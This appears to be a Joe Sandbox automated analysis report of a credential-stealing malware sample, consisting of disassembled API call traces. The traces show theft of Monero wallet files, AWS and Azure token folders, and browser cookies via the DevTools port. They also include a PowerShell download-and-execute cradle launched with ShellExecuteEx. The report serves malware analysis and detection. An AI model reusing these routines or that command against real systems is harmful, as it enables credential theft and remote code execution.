                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75B2D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75B56
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75B89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75BB5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F75BEF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75C4C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75C70
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2428362635-0
                                    • Opcode ID: 2fc37cc5c2e7347b8ac2cb676b3c7f8f519125cfa957b6ed47e055d51f607d91
                                    • Instruction ID: 2af2f04b158cf23dfbb97a807dd8c0c43feab42a72a1e172b1e77898556c2ac2
                                    • Opcode Fuzzy Hash: 2fc37cc5c2e7347b8ac2cb676b3c7f8f519125cfa957b6ed47e055d51f607d91
                                    • Instruction Fuzzy Hash: 1002C470E01A099FDB25EFA8C989AAE77B5AF44710F04813DF819D7240DB78DC45EB92
                                    APIs
                                      • Part of subcall function 00F61120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F61135
                                      • Part of subcall function 00F61120: RtlAllocateHeap.NTDLL(00000000), ref: 00F6113C
                                      • Part of subcall function 00F61120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00F61159
                                      • Part of subcall function 00F61120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00F61173
                                      • Part of subcall function 00F61120: RegCloseKey.ADVAPI32(?), ref: 00F6117D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F611C0
                                    • lstrlen.KERNEL32(?), ref: 00F611CD
                                    • lstrcat.KERNEL32(?,.keys), ref: 00F611E8
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6121F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F6122D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61251
                                    • lstrcat.KERNEL32(00000000,00A99108), ref: 00F61259
                                    • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00F61264
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61288
                                    • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00F61294
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F612BA
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F612FF
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6130E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61335
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6133D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61378
                                    • lstrcat.KERNEL32(00000000), ref: 00F61385
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F613AC
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F613D5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61401
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6143D
                                      • Part of subcall function 00F7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00F7EE12
                                    • DeleteFileA.KERNEL32(?), ref: 00F61471
                                    Strings
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                    • String ID: .keys$\Monero\wallet.keys
                                    • API String ID: 2881711868-3586502688
                                    • Opcode ID: f903b1159e3f6b6e938271f988b45bc2186da864e1586a8d8e4eb139c642f53c
                                    • Instruction ID: 099f14d0b358f5ab061f178094fcb445ac88d022a0eed2c5e970bc57fc1974a7
                                    • Opcode Fuzzy Hash: f903b1159e3f6b6e938271f988b45bc2186da864e1586a8d8e4eb139c642f53c
                                    • Instruction Fuzzy Hash: 42A1A371E116099BCB21EFB4DD9AAAE77B9BF44310F084028F915E7241DB38DD41EBA1
                                    APIs
                                    • memset.MSVCRT ref: 00F7E740
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00F7E769
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E79F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E7AD
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00F7E7C6
                                    • memset.MSVCRT ref: 00F7E805
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00F7E82D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E85F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E86D
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00F7E886
                                    • memset.MSVCRT ref: 00F7E8C5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F7E8F1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E920
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E92E
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F7E947
                                    • memset.MSVCRT ref: 00F7E986
                                    Strings
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$memset$FolderPathlstrcpy
                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 4067350539-3645552435
                                    • Opcode ID: 1fc61a3d3e6075963b23057d4d9079709a70693896a88b6e4f0c5a8ea863d7d3
                                    • Instruction ID: 7bdf2e1499a3353bbc4147bb42abf97a2c11e1a7bb2ea699834cebb19f5afc6a
                                    • Opcode Fuzzy Hash: 1fc61a3d3e6075963b23057d4d9079709a70693896a88b6e4f0c5a8ea863d7d3
                                    • Instruction Fuzzy Hash: 8C715971E4021DABDB75EBA0DC46FED7378AF48300F0444A9B7299B1C0DBB4AE849B55
                                    APIs
                                    • lstrcpy.KERNEL32 ref: 00F7ABCF
                                    • lstrlen.KERNEL32(00A9DFC8), ref: 00F7ABE5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AC0D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7AC18
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AC41
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AC84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7AC8E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ACB7
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F7ACD1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ACF3
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F7ACFF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AD28
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F7AD3A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AD5C
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F7AD68
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AD91
                                    • lstrlen.KERNEL32(00A9E070), ref: 00F7ADA7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ADCF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7ADDA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AE03
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7AE3F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7AE49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AE6F
                                    • lstrlen.KERNEL32(00000000), ref: 00F7AE85
                                    • lstrcpy.KERNEL32(00000000,00A9DFE0), ref: 00F7AEB8
                                    Strings
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen
                                    • String ID: f
                                    • API String ID: 2762123234-1993550816
                                    • Opcode ID: d7b1cfb113c66b775772f2e99c3b88f4e794ccafc9d0a0828f390f13a559fa19
                                    • Instruction ID: 4d250a4fc3ba4486ddbc6681aaf44f46ca28fe60e2deffb7004f72e44305700b
                                    • Opcode Fuzzy Hash: d7b1cfb113c66b775772f2e99c3b88f4e794ccafc9d0a0828f390f13a559fa19
                                    • Instruction Fuzzy Hash: 22B1C33091151A9BCB32EFA4DD49AAFB3B9BF84310F094439B429D7244DB78DD41EB92
                                    APIs
                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,00F772A4), ref: 00F847E6
                                    • GetProcAddress.KERNEL32(00000000,connect), ref: 00F847FC
                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00F8480D
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00F8481E
                                    • GetProcAddress.KERNEL32(00000000,htons), ref: 00F8482F
                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00F84840
                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 00F84851
                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 00F84862
                                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00F84873
                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00F84884
                                    • GetProcAddress.KERNEL32(00000000,send), ref: 00F84895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                    • API String ID: 2238633743-3087812094
                                    • Opcode ID: 47bcf820c5bd5c7c5036965877c11168c3054faf0eb937d96277cbb8f09885f0
                                    • Instruction ID: a33f05e00b957e68b08bf3450f5eecebb536e1a064440a07de0bec36c5d5298e
                                    • Opcode Fuzzy Hash: 47bcf820c5bd5c7c5036965877c11168c3054faf0eb937d96277cbb8f09885f0
                                    • Instruction Fuzzy Hash: 3D1100B1956738AFDB39DFB4A81DA553ABCBB0AB09308083EF171D2148D6F484D0EB55
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7BE53
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7BE86
                                    • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00F7BE91
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7BEB1
                                    • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00F7BEBD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BEE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7BEEB
                                    • lstrlen.KERNEL32(')"), ref: 00F7BEF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BF13
                                    • lstrcat.KERNEL32(00000000,')"), ref: 00F7BF1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BF46
                                    • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00F7BF66
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7BF88
                                    • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00F7BF94
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7BFBA
                                    • ShellExecuteEx.SHELL32(?), ref: 00F7C00C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 4016326548-898575020
                                    • Opcode ID: 6d449720e2750eedd5c6c5131dd29df26a63f57e4c7053b7f4612763eaeacf0d
                                    • Instruction ID: dcd894a5595f0a5ebc4cd6addd3abd56ca597431fe8fa4c428c24c47ed7e19ef
                                    • Opcode Fuzzy Hash: 6d449720e2750eedd5c6c5131dd29df26a63f57e4c7053b7f4612763eaeacf0d
                                    • Instruction Fuzzy Hash: 7661E670E116099BCF21AFF48C896AF7BB8AF45714F04443AF529D7201DB38D941BB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8184F
                                    • lstrlen.KERNEL32(00A87328), ref: 00F81860
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81887
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81892
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F818C1
                                    • lstrlen.KERNEL32(00F94FA0), ref: 00F818D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F818F4
                                    • lstrcat.KERNEL32(00000000,00F94FA0), ref: 00F81900
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8192F
                                    • lstrlen.KERNEL32(00A87338), ref: 00F81945
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8196C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81977
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F819A6
                                    • lstrlen.KERNEL32(00F94FA0), ref: 00F819B8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F819D9
                                    • lstrcat.KERNEL32(00000000,00F94FA0), ref: 00F819E5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81A14
                                    • lstrlen.KERNEL32(00A87238), ref: 00F81A2A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81A51
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81A5C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81A8B
                                    • lstrlen.KERNEL32(00A87248), ref: 00F81AA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81AC8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81AD3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81B02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1049500425-0
                                    • Opcode ID: ce87a37ec888bece2718da8d94e7625fcad53174ad867cc002575da72c254994
                                    • Instruction ID: 9ec2bdaebe20c66a70752b6a98496d6ecdab99e69ce5b7ba76ee33b6e9dde964
                                    • Opcode Fuzzy Hash: ce87a37ec888bece2718da8d94e7625fcad53174ad867cc002575da72c254994
                                    • Instruction Fuzzy Hash: EC9152B1A017079FDB34AFB5DC89A56B7ECBF14314B14453CA8A6C3241DB78E842EB60
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74793
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F747C5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74812
                                    • lstrlen.KERNEL32(00F94B60), ref: 00F7481D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7483A
                                    • lstrcat.KERNEL32(00000000,00F94B60), ref: 00F74846
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7486B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74898
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F748A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F748CA
                                    • StrStrA.SHLWAPI(?,00000000), ref: 00F748DC
                                    • lstrlen.KERNEL32(?), ref: 00F748F0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74931
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F749B8
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F749E1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74A0A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74A30
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74A5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 4107348322-3310892237
                                    • Opcode ID: 0a7555b6b289656ebb1af2b44635676b3410945e97d94c0472a0db29db54f13c
                                    • Instruction ID: 85599b7739d58c9f45f229474a5c24aacffd542dcd044a6532debc7c6fb4c6db
                                    • Opcode Fuzzy Hash: 0a7555b6b289656ebb1af2b44635676b3410945e97d94c0472a0db29db54f13c
                                    • Instruction Fuzzy Hash: 30B1A571E1160A9BDB35EFB4DD869AE77B9AF44310F048439F85997201DB38FC01AB92
                                    APIs
                                      • Part of subcall function 00F690C0: InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F690DF
                                      • Part of subcall function 00F690C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F690FC
                                      • Part of subcall function 00F690C0: InternetCloseHandle.WININET(00000000), ref: 00F69109
                                    • strlen.MSVCRT ref: 00F692E1
                                    • strlen.MSVCRT ref: 00F692FA
                                      • Part of subcall function 00F68980: std::_Xinvalid_argument.LIBCPMT ref: 00F68996
                                    • strlen.MSVCRT ref: 00F69399
                                    • strlen.MSVCRT ref: 00F693E6
                                    • lstrcat.KERNEL32(?,cookies), ref: 00F69547
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F69559
                                    • lstrcat.KERNEL32(?,?), ref: 00F6956A
                                    • lstrcat.KERNEL32(?,00F94B98), ref: 00F6957C
                                    • lstrcat.KERNEL32(?,?), ref: 00F6958D
                                    • lstrcat.KERNEL32(?,.txt), ref: 00F6959F
                                    • lstrlen.KERNEL32(?), ref: 00F695B6
                                    • lstrlen.KERNEL32(?), ref: 00F695DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F69614
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 1201316467-3542011879
                                    • Opcode ID: 07c77cd9abbe1fef54e055ee659627c5c8be20ce4e480a1b4a6e2d3d88cd4e11
                                    • Instruction ID: 44b592acefddd4bd486f3be5db538a50e4a53e4057a502a27d84028271bf2e9b
                                    • Opcode Fuzzy Hash: 07c77cd9abbe1fef54e055ee659627c5c8be20ce4e480a1b4a6e2d3d88cd4e11
                                    • Instruction Fuzzy Hash: 6BE14670E14218DBDF14DFA8C880ADEBBB9FF48300F1484A9E519A7241DB75AE45EF91
                                    APIs
                                    • memset.MSVCRT ref: 00F7D9A1
                                    • memset.MSVCRT ref: 00F7D9B3
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7D9DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7DA0E
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7DA1C
                                    • lstrcat.KERNEL32(?,00A9E490), ref: 00F7DA36
                                    • lstrcat.KERNEL32(?,?), ref: 00F7DA4A
                                    • lstrcat.KERNEL32(?,00A9CFF8), ref: 00F7DA5E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7DA8E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F7DA95
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7DAFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2367105040-0
                                    • Opcode ID: c218790f079433fac7d7bcdb24ac7b14b350917d052a12daf65e45fa17cc6f10
                                    • Instruction ID: 4019c92540a9efc7ceca8afe74fcfda927272bbd0ef467cc718301b4d7059e36
                                    • Opcode Fuzzy Hash: c218790f079433fac7d7bcdb24ac7b14b350917d052a12daf65e45fa17cc6f10
                                    • Instruction Fuzzy Hash: 4EB1C271D102199FDB20EFA4DC849EE77B8FF88310F448469E52AE7241D7349E45EB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6B330
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B37E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B3A9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6B3B1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B3D9
                                    • lstrlen.KERNEL32(00F94C50), ref: 00F6B450
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B474
                                    • lstrcat.KERNEL32(00000000,00F94C50), ref: 00F6B480
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B4A9
                                    • lstrlen.KERNEL32(00000000), ref: 00F6B52D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B557
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6B55F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B587
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F6B5FE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B622
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F6B62E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B65E
                                    • lstrlen.KERNEL32(?), ref: 00F6B767
                                    • lstrlen.KERNEL32(?), ref: 00F6B776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6B79E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 1141331ead0c56cf50a5cb36f25d300752379ce1e296aa081212cf8866b6608f
                                    • Instruction ID: 1d91c3ef3babc946c3e00bb80b7032e366813464739045c0a8f32dd30526b8a9
                                    • Opcode Fuzzy Hash: 1141331ead0c56cf50a5cb36f25d300752379ce1e296aa081212cf8866b6608f
                                    • Instruction Fuzzy Hash: 96027D70E016058FCB29DF64C989A6AB7B4BF44328F18807DE419DB356DB75DC82EB80
                                    APIs
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • RegOpenKeyExA.ADVAPI32(?,00A9B258,00000000,00020019,?), ref: 00F837BD
                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00F837F7
                                    • wsprintfA.USER32 ref: 00F83822
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00F83840
                                    • RegCloseKey.ADVAPI32(?), ref: 00F8384E
                                    • RegCloseKey.ADVAPI32(?), ref: 00F83858
                                    • RegQueryValueExA.ADVAPI32(?,00A9E190,00000000,000F003F,?,?), ref: 00F838A1
                                    • lstrlen.KERNEL32(?), ref: 00F838B6
                                    • RegQueryValueExA.ADVAPI32(?,00A9DF80,00000000,000F003F,?,00000400), ref: 00F83927
                                    • RegCloseKey.ADVAPI32(?), ref: 00F83972
                                    • RegCloseKey.ADVAPI32(?), ref: 00F83989
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 13140697-3278919252
                                    • Opcode ID: 618cb8f2d2fcc447ab4fafe9380eb1cb7a67f3a754081fd87d7d30be27a0d3b0
                                    • Instruction ID: 961b78e2c7c573fe5687efa82409e0e86e49ebeb57c6605aac12dbb855a4bb9b
                                    • Opcode Fuzzy Hash: 618cb8f2d2fcc447ab4fafe9380eb1cb7a67f3a754081fd87d7d30be27a0d3b0
                                    • Instruction Fuzzy Hash: 759190B2D002089FCB24EF94DD84AEEB7B9FB48720F148569E519A7211D735AE41DFA0
                                    APIs
                                    • InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F690DF
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F690FC
                                    • InternetCloseHandle.WININET(00000000), ref: 00F69109
                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 00F69166
                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00F69197
                                    • InternetCloseHandle.WININET(00000000), ref: 00F691A2
                                    • InternetCloseHandle.WININET(00000000), ref: 00F691A9
                                    • strlen.MSVCRT ref: 00F691BA
                                    • strlen.MSVCRT ref: 00F691ED
                                    • strlen.MSVCRT ref: 00F6922E
                                    • strlen.MSVCRT ref: 00F6924C
                                      • Part of subcall function 00F68980: std::_Xinvalid_argument.LIBCPMT ref: 00F68996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 1530259920-2144369209
                                    • Opcode ID: a8cc049e8943aa4496609b1bf0f760516b3a38f7fcbdb41b0a4699fab7a4342b
                                    • Instruction ID: b7e72934ba131bd79b08ad901734e9989acca12334fd84bb0d954bd626e81d41
                                    • Opcode Fuzzy Hash: a8cc049e8943aa4496609b1bf0f760516b3a38f7fcbdb41b0a4699fab7a4342b
                                    • Instruction Fuzzy Hash: 3651D671A002096BEB20DFA8DC45FDEB7FDDB84710F140169F514E7281DBB4EA45A7A2
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00F816A1
                                    • lstrcpy.KERNEL32(00000000,00A8B8D8), ref: 00F816CC
